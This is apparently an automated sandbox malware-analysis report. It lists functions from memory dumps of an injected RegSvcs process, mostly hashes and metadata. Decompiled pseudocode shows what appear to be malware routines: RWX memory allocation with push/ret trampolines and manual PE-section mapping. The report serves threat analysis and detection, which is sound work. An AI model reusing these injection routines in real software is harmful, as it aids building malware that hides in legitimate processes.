                                                • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FC60 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 6 85fc60-85fc75 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FD8C Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 8 85fd8c-85fda4 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FDC0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 9 85fdc0-85fdd5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FEA0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 10 85fea0-85feb5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
                                                • Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
                                                • Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FED0 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 11 85fed0-85fee5 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0085FFB4 Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 12 85ffb4-85ffc9 LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056971464.0000000000850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00840000, based on PE: true
                                                • Associated: 00000008.00000002.1056971464.0000000000840000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000930000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000940000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000944000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000947000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.0000000000950000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056971464.00000000009B0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_840000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B0E0 Relevance: 1.4, Strings: 1, Instructions: 177COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 58%
                                                			E0041B0E0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				short _v28;
				signed int _v31;
				char _v32;
				intOrPtr _v36;
				char _v44;
				void* __ebp;
				signed int _t65;
				signed int _t66;
				signed int _t69;
				signed int _t73;
				signed int _t78;
				void* _t80;
				void* _t84;
				signed int _t86;
				signed int _t87;
				signed int _t89;
				signed int _t90;
				intOrPtr _t93;
				signed int _t95;
				void* _t98;
				intOrPtr _t105;
				void* _t116;
				signed int _t121;
				signed int _t122;
				intOrPtr _t124;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t121 = E0041BC90(_a12);
				_t65 = E0041BCC0(_a12);
				_t126 = _t125 + 8;
				_v24 = _t65;
				if(_t65 != 0) {
					_t124 = _a4;
					_t66 = E0041BD40(_t124, 0, _t121 + _t65 * 2 + _t65 + _t121 + _t65 * 2 + _t65, 0x3000, 0x40); // executed
					_t95 = _t66;
					 *(_t124 + 0x14) = _t95;
					 *((intOrPtr*)(_t124 + 0x18)) = _t95 + _t121;
					_t69 = L00414060(E0041BDE0(_t95, _a12, _t121), _t95 + _t121, _t124,  *(_t124 + 0x14), _t95, 3); // executed
					_t127 = _t126 + 0x30;
					__eflags = _t69;
					if(_t69 == 0) {
						L4:
						__eflags = 0;
						return 0;
					} else {
						_t73 = L00414060(E0041BDE0( *((intOrPtr*)(_t124 + 0x18)), _a12, _t121), _a12, _t124,  *((intOrPtr*)(_t124 + 0x18)), _t95, 3); // executed
						_t128 = _t127 + 0x1c;
						__eflags = _t73;
						if(_t73 != 0) {
							_t112 =  *(_t124 + 0x14);
							E0041BB40( &_v44,  *(_t124 + 0x14));
							_t105 = _t95 + _t121 * 2;
							_t77 =  *((intOrPtr*)(_v36 + 0x1c)) + _t95;
							_t122 = 0;
							_t129 = _t128 + 8;
							_v16 = _t77;
							_v12 = _t105;
							_v32 = 0x68;
							_v28 = 0xc300;
							__eflags = _v24;
							if(_v24 > 0) {
								_v20 = _t105 - _t95;
								_t26 = _t122 + 6; // 0x6
								_t98 = _t26;
								while(1) {
									_t112 =  *((intOrPtr*)(_t77 + _t122 * 4)) + _a8;
									_v31 =  *((intOrPtr*)(_t77 + _t122 * 4)) + _a8;
									E0041BDE0(_t105,  &_v32, _t98);
									_t93 = _v20;
									_v12 = _v12 + _t98;
									 *((intOrPtr*)(_v16 + _t122 * 4)) = _t93;
									_t77 = _t93 + _t98;
									_t122 = _t122 + 1;
									_t129 = _t129 + 0xc;
									_v20 = _t93 + _t98;
									__eflags = _t122 - _v24;
									if(_t122 >= _v24) {
										goto L9;
									}
									_t105 = _v12;
									_t77 = _v16;
								}
							}
							L9:
							_push(_t124); // executed
							_t78 = L00415380(_t77, _t112); // executed
							_t130 = _t129 + 4;
							 *(_t124 + 0x1c) = _t78;
							__eflags = _t78;
							if(__eflags != 0) {
								_push(_t124);
								_t90 = L0041AEF0(_t78, _t112);
								_t130 = _t130 + 4;
								 *(_t124 + 0x20) = _t90;
								__eflags = _t90;
								if(__eflags == 0) {
									_t45 = _t124 + 0x4b0;
									 *_t45 =  *(_t124 + 0x4b0) ^  *(_t124 + 0x14);
									__eflags =  *_t45;
									 *((char*)(_t124 + 0x29)) = 1;
								}
							}
							_t80 = E0041B060(__eflags,  *(_t124 + 0x14), _a8);
							_push( *(_t124 + 0x14));
							_push(_t124);
							L0041AD60(_t80,  *(_t124 + 0x14));
							 *(_t124 + 0x10) =  *(_t124 + 4) ^  *(_t124 + 0x14);
							_t84 = E0041BE10(_t124 + 0xba4, 0xf0);
							_push(0);
							L00419EB0(_t84,  &_v8, _t124, 0x23,  &_v8, 2); // executed
							_t86 = _v8;
							__eflags = _t86;
							if(_t86 == 0) {
								L15:
								_t87 = 0;
								__eflags = 0;
							} else {
								__eflags = _t86;
								if(_t86 != 0) {
									goto L15;
								} else {
									_t87 = 1;
								}
							}
							_t116 = 1 - _t87;
							__eflags = 1;
							if(1 != 0) {
								_t89 = 0;
								__eflags = 0;
								do {
									 *((intOrPtr*)(_t89 + _t124 + 0x51)) =  *((intOrPtr*)(_t89 + _t124 + 0x51)) + 0xfe;
									_t89 = _t89 + 1;
									__eflags = _t89 - 0xd;
								} while (_t89 < 0xd);
							}
							_t61 = _t124 + 0x2b;
							 *_t61 =  *(_t124 + 0x2b) + _t116;
							__eflags =  *_t61;
							return  *(_t124 + 0x14);
						} else {
							goto L4;
						}
					}
				} else {
					return _t65;
				}
			}







































                                                0x0041b0f2
                                                0x0041b0f4
                                                0x0041b0f9
                                                0x0041b0fc
                                                0x0041b101
                                                0x0041b109
                                                0x0041b11f
                                                0x0041b124
                                                0x0041b12f
                                                0x0041b132
                                                0x0041b142
                                                0x0041b147
                                                0x0041b14a
                                                0x0041b14c
                                                0x0041b170
                                                0x0041b172
                                                0x0041b178
                                                0x0041b14e
                                                0x0041b164
                                                0x0041b169
                                                0x0041b16c
                                                0x0041b16e
                                                0x0041b179
                                                0x0041b181
                                                0x0041b18c
                                                0x0041b18f
                                                0x0041b191
                                                0x0041b193
                                                0x0041b196
                                                0x0041b199
                                                0x0041b19c
                                                0x0041b1a3
                                                0x0041b1a9
                                                0x0041b1ac
                                                0x0041b1b2
                                                0x0041b1b5
                                                0x0041b1b5
                                                0x0041b1c6
                                                0x0041b1c9
                                                0x0041b1d2
                                                0x0041b1d5
                                                0x0041b1da
                                                0x0041b1e0
                                                0x0041b1e3
                                                0x0041b1e6
                                                0x0041b1e8
                                                0x0041b1e9
                                                0x0041b1ec
                                                0x0041b1ef
                                                0x0041b1f2
                                                0x00000000
                                                0x00000000
                                                0x0041b1c0
                                                0x0041b1c3
                                                0x0041b1c3
                                                0x0041b1c6
                                                0x0041b1f4
                                                0x0041b1f4
                                                0x0041b1f5
                                                0x0041b1fa
                                                0x0041b1fd
                                                0x0041b200
                                                0x0041b202
                                                0x0041b204
                                                0x0041b205
                                                0x0041b20a
                                                0x0041b20d
                                                0x0041b210
                                                0x0041b212
                                                0x0041b217
                                                0x0041b217
                                                0x0041b217
                                                0x0041b21d
                                                0x0041b21d
                                                0x0041b212
                                                0x0041b229
                                                0x0041b231
                                                0x0041b232
                                                0x0041b233
                                                0x0041b24a
                                                0x0041b24d
                                                0x0041b252
                                                0x0041b25d
                                                0x0041b262
                                                0x0041b269
                                                0x0041b26b
                                                0x0041b278
                                                0x0041b278
                                                0x0041b278
                                                0x0041b26d
                                                0x0041b26d
                                                0x0041b26f
                                                0x00000000
                                                0x0041b271
                                                0x0041b271
                                                0x0041b271
                                                0x0041b26f
                                                0x0041b27c
                                                0x0041b27c
                                                0x0041b27e
                                                0x0041b280
                                                0x0041b280
                                                0x0041b284
                                                0x0041b284
                                                0x0041b288
                                                0x0041b289
                                                0x0041b289
                                                0x0041b284
                                                0x0041b28e
                                                0x0041b28e
                                                0x0041b28e
                                                0x0041b29a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0041b16e
                                                0x0041b108
                                                0x0041b108
                                                0x0041b108

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: h
                                                • API String ID: 0-2439710439
                                                • Opcode ID: 2cadd78c51b6409c58724dcb725c10653822dbb301f0c94078e9c697356bb825
                                                • Instruction ID: 11a4755c7cd1838a7bd4d4a785142f4b16d12da32d5308bc595ca18a2e381378
                                                • Opcode Fuzzy Hash: 2cadd78c51b6409c58724dcb725c10653822dbb301f0c94078e9c697356bb825
                                                • Instruction Fuzzy Hash: A451C171A00209ABDB24DFA5DC81AEFB7B9EF48304F00456EE90597641E738EA4587E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BB90 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 43%
                                                			E0041BB90(void* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _t29;
				void* _t34;
				intOrPtr _t37;
				intOrPtr* _t43;
				intOrPtr _t49;
				intOrPtr _t56;
				intOrPtr _t57;
				intOrPtr* _t63;
				void* _t67;
				void* _t69;
				void* _t70;

				_t63 = _a8;
				if(_t63 == 0 ||  *_t63 != 0x5a4d) {
					L3:
					return 0;
				} else {
					_t43 =  *((intOrPtr*)(_t63 + 0x3c)) + _t63;
					if( *_t43 == 0x4550) {
						_t29 = E0041BF90(_a4,  *((intOrPtr*)(_t43 + 0x50)) + 1); // executed
						_t67 = _t29;
						E0041BE10(_t67,  *((intOrPtr*)(_t43 + 0x50)));
						E0041BDE0(_t67, _t63,  *((intOrPtr*)(_t43 + 0x54)));
						_t56 = 0;
						_t70 = _t69 + 0x1c;
						_v8 = 0;
						if(0 <  *(_t43 + 6)) {
							_a8 = 0;
							while(1) {
								_t13 = _t67 + 0xf8; // 0x120
								_t34 =  *((intOrPtr*)(_t63 + 0x3c)) + _a8 + _t13;
								_t49 =  *((intOrPtr*)(_t34 + 0x10));
								if(_t49 == _t56) {
									 *((intOrPtr*)(_t34 + 0x14)) = _t56;
								}
								_t57 =  *((intOrPtr*)(_t34 + 8));
								if(_t49 <= _t57) {
									_push(_t49);
									_push( *((intOrPtr*)(_t34 + 0x14)) + _t63);
									_push( *((intOrPtr*)(_t34 + 0xc)) + _t67);
								} else {
									_push(_t57);
									_push( *((intOrPtr*)(_t34 + 0x14)) + _t63);
									_push( *((intOrPtr*)(_t34 + 0xc)) + _t67);
								}
								E0041BDE0();
								_a8 = _a8 + 0x28;
								_t37 = _v8 + 1;
								_t70 = _t70 + 0xc;
								_v8 = _t37;
								if(_t37 >= ( *(_t43 + 6) & 0x0000ffff)) {
									goto L13;
								}
								_t56 = 0;
							}
						}
						L13:
						return _t67;
					} else {
						goto L3;
					}
				}
			}















                                                0x0041bb96
                                                0x0041bb9b
                                                0x0041bbb4
                                                0x0041bbbb
                                                0x0041bba7
                                                0x0041bbaa
                                                0x0041bbb2
                                                0x0041bbc6
                                                0x0041bbce
                                                0x0041bbd2
                                                0x0041bbdd
                                                0x0041bbe2
                                                0x0041bbe6
                                                0x0041bbe9
                                                0x0041bbf0
                                                0x0041bbf2
                                                0x0041bbf9
                                                0x0041bbff
                                                0x0041bbff
                                                0x0041bc06
                                                0x0041bc0b
                                                0x0041bc0d
                                                0x0041bc0d
                                                0x0041bc10
                                                0x0041bc15
                                                0x0041bc29
                                                0x0041bc2f
                                                0x0041bc32
                                                0x0041bc17
                                                0x0041bc17
                                                0x0041bc20
                                                0x0041bc23
                                                0x0041bc23
                                                0x0041bc33
                                                0x0041bc3f
                                                0x0041bc43
                                                0x0041bc44
                                                0x0041bc47
                                                0x0041bc4c
                                                0x00000000
                                                0x00000000
                                                0x0041bbf7
                                                0x0041bbf7
                                                0x0041bbf9
                                                0x0041bc4e
                                                0x0041bc56
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0041bbb2

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (
                                                • API String ID: 0-3887548279
                                                • Opcode ID: 3b361cb9b8b7f08150b98e90478dbae87c145ceb8b22ddcdff5a2ba5fb7d524f
                                                • Instruction ID: de6014840b350da9b84fc51addf1f4ba297d704218cb57e5295807ecabf85d94
                                                • Opcode Fuzzy Hash: 3b361cb9b8b7f08150b98e90478dbae87c145ceb8b22ddcdff5a2ba5fb7d524f
                                                • Instruction Fuzzy Hash: 2B212171600105ABCB18CF5ADD85DAB77A9EFC4714714C19AE8098B705E738ED91CBE8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B2A0 Relevance: .1, Instructions: 80COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E0041B2A0(void* __ecx, void* __edx, void* __eflags, intOrPtr* _a4) {
				char _v8;
				void* __ebp;
				void* _t19;
				intOrPtr _t23;
				void* _t24;
				void* _t27;
				void* _t32;
				signed int _t39;
				signed int _t40;
				void* _t46;
				void* _t50;
				intOrPtr* _t51;

				_t41 = __edx;
				_t51 = _a4;
				_v8 = 0;
				_t47 = E0041B400(0, L00409C00(_t19, __edx, _t51, 0x71, _t46, _t50));
				_t23 = L00414A40( *((intOrPtr*)(_t21 + 0x28)), _t41, _t51,  *((intOrPtr*)(_t21 + 0x28)), 2, 0); // executed
				_t34 = _t23;
				if(_t23 != 0) {
					_t24 = E0041B0E0(_t51,  *((intOrPtr*)(_t47 + 0x18)), _t34); // executed
					if(_t24 == 0) {
						goto L1;
					} else {
						 *(_t51 + 0x10) =  *(_t51 + 0x14) ^  *(_t51 + 4);
						_t27 = E0041BE10(_t51 + 0xba4, 0xf0);
						_push(0);
						_push(4);
						_t39 =  &_v8;
						L00419EF0(_t27,  *_t51, _t51,  *_t51, 7, _t39); // executed
						_t40 = _t39 & 0xffffff00 | _v8 !=  *_t51;
						if(_t40 != 0) {
							_t32 = 0;
							do {
								 *((intOrPtr*)(_t32 + _t51 + 0x44)) =  *((intOrPtr*)(_t32 + _t51 + 0x44)) + 0xff;
								_t32 = _t32 + 1;
							} while (_t32 < 0xd);
						}
						 *((intOrPtr*)(_t51 + 0x2a)) =  *((intOrPtr*)(_t51 + 0x2a)) + _t40;
						E0041BDC0(_t51, _t34); // executed
						return 1;
					}
				} else {
					L1:
					return 0;
				}
			}















                                                0x0041b2a0
                                                0x0041b2a6
                                                0x0041b2ad
                                                0x0041b2c3
                                                0x0041b2cc
                                                0x0041b2d1
                                                0x0041b2d8
                                                0x0041b2e9
                                                0x0041b2f3
                                                0x00000000
                                                0x0041b2f5
                                                0x0041b307
                                                0x0041b30a
                                                0x0041b311
                                                0x0041b313
                                                0x0041b315
                                                0x0041b31d
                                                0x0041b32a
                                                0x0041b32f
                                                0x0041b331
                                                0x0041b335
                                                0x0041b335
                                                0x0041b339
                                                0x0041b33a
                                                0x0041b335
                                                0x0041b33f
                                                0x0041b344
                                                0x0041b357
                                                0x0041b357
                                                0x0041b2da
                                                0x0041b2da
                                                0x0041b2e2
                                                0x0041b2e2

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10999a0b594d4bb9ccb7fd640b0bc3d4729c218e6ed9dd6080db1a7ff87bd53b
                                                • Instruction ID: 34e38bc02a7ad1d62aa3476de6eaa4f460553b48bfc98e10f947c4d47e385991
                                                • Opcode Fuzzy Hash: 10999a0b594d4bb9ccb7fd640b0bc3d4729c218e6ed9dd6080db1a7ff87bd53b
                                                • Instruction Fuzzy Hash: 5511D5716442087BE220DA65DC82FEB739CDF49708F10051AFA488B282E7A5AD9543E9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041B590 Relevance: .0, Instructions: 42COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 30%
                                                			E0041B590(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v108;
				char _v367;
				char _v368;
				void* __ebp;
				void* _t23;

				_v368 = 0;
				E0041BE60( &_v367, 0, 0x103);
				E0041BDE0( &_v368, _a8, 0xd);
				L0040AB60(L00409E10( &_v108,  &_v368),  &_v108,  &_v108, _a12, 0x10,  &_v108);
				L0040ABE0(L0040AB30( &_v108,  &_v108),  &_v368,  &_v368, 0xd,  &_v108,  &_v108);
				_push( &_v368);
				_push(_a4); // executed
				_t23 = L0040ACE0( &_v368,  &_v368); // executed
				return _t23;
			}








                                                0x0041b5a7
                                                0x0041b5ae
                                                0x0041b5c0
                                                0x0041b5d8
                                                0x0041b5f3
                                                0x0041b601
                                                0x0041b602
                                                0x0041b603
                                                0x0041b60e

                                                Memory Dump Source
                                                • Source File: 00000008.00000002.1056834096.000000000041B000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000008.00000002.1056834096.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000008.00000002.1056834096.000000000041F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_8_2_400000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: b460ce71229560444c1ca186c51c88d3d7de14b770db45f4d8e95f59e83d5391
